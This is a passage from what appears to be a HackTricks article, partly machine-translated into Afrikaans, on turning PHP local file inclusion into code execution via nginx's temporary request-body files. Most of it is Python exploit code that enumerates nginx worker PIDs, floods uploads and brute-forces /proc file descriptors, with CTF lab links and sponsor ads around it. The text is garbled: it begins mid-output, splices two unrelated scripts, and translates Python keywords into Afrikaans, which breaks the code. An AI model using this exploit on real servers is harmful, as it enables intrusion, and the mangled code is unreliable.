WhiteIntel is 'n donkerweb-aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur steel-malwaregekompromitteer is.
Die primêre doel van WhiteIntel is om rekening-oorneeminge en lospryse-aanvalle te beveg wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin vir gratis probeer by:
/dev/pts/0 lrwx------ 1 www-data www-data 64 Des 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Des 25 23:49 10 -> anon_inode:[eventfd] lrwx------ 1 www-data www-data 64 Des 25 23:49 11 -> socket:[27587] lrwx------ 1 www-data www-data 64 Des 25 23:49 12 -> socket:[27589] lrwx------ 1 www-data www-data 64 Des 25 23:56 13 -> socket:[44926] lrwx------ 1 www-data www-data 64 Des 25 23:57 14 -> socket:[44927] lrwx------ 1 www-data www-data 64 Des 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... ``` Nota: 'n Mens kan nie direk `/proc/34/fd/15` insluit in hierdie voorbeeld nie, aangesien PHP se `include`-funksie die pad na `/var/lib/nginx/body/0000001368 (deleted)` sou oplos wat nie in die lêersisteem bestaan nie. Hierdie klein beperking kan gelukkig omseil word deur 'n mate van indirektheid soos: `/proc/self/fd/34/../../../34/fd/15` wat uiteindelik die inhoud van die uitgevee `/var/lib/nginx/body/0000001368`-lêer sal uitvoer. ## Volledige Uitbuiting ```python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv[1]}:{sys.argv[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid_max' }) pid_max = int(r.text) print(f'[*] cpus: {cpus}; pid_max: {pid_max}') nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_workers.append(pid) if len(nginx_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('[+] starting uploader') while not done: requests.get(URL, data=' //'
def send_payload_worker(requests_session): while True: send_payload(requests_session)def send_payload_multiprocess(requests_session): # Gebruik alle CPU's om die payload as versoekliggaam vir Nginx te stuur vir \_ in reeks(multiprocessing.cpu_count()): p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,)) p.start()
def generate_random_path_prefix(nginx_pids): # Hierdie metode skep 'n pad van 'n willekeurige hoeveelheid ProcFS-padkomponente. 'n Opgewekte pad sal lyk soos /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root path = "" component_num = random.randint(0, 10) vir \_ in reeks(component_num): pid = random.choice(nginx_pids) as random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" anders: path += f"/proc/{pid}/root" terug pad
def read_file(requests_session, nginx_pid, fd, nginx_pids): nginx_pid_list = lys(nginx_pids) terwyl True: path = generate_random_path_prefix(nginx_pid_list) path += f"/proc/{nginx_pid}/fd/{fd}" probeer: d = requests_session.get(SERVER + f"/?action=include\&file={path}").text behalwe: voortgaan # Vlae is geformateer as hxp{} as "hxp" in d: druk("Gevind vlag! ") druk(d)
def read_file_worker(requests_session, nginx_pid, nginx_pids): # Skandeer Nginx FD's tussen 10 - 45 in 'n lus. Aangesien lêers en sokkels aanhou sluit - dit is baie algemeen vir die versoekliggaam FD om binne hierdie reeks oop te maak vir fd in reeks(10, 45): draad = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) draad.start()
def read_file_multiprocess(requests_session, nginx_pids): vir nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start()
if **name** == "**main**": druk('\[DEBUG] Skep versoeksessie') requests_session = skep_versoek_sessie() druk('\[DEBUG] Kry Nginx pids') nginx_pids = kry_nginx_pids(requests_session) druk(f'\[DEBUG] Nginx pids: {nginx_pids}') druk('\[DEBUG] Begin payload stuur') send_payload_multiprocess(requests_session) druk('\[DEBUG] Begin fd lesers') read_file_multiprocess(requests_session, nginx_pids)
## Labs
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
## References
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for **free** at:
<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
